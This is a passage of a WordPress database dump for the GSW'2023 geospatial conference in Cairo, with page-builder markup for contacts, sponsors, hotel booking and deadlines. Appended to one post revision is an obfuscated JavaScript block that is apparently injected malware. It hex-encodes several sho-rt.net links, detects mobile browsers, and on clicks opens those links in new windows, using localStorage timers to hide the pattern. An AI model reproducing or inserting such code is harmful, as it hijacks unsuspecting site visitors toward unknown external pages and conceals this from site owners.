href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:32:48','2023-05-24 23:32:48','',3066,'https://gsw2023.com/?p=4571',0,'revision','',0),
(4572,1,'2023-05-24 23:33:19','2023-05-24 23:33:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" 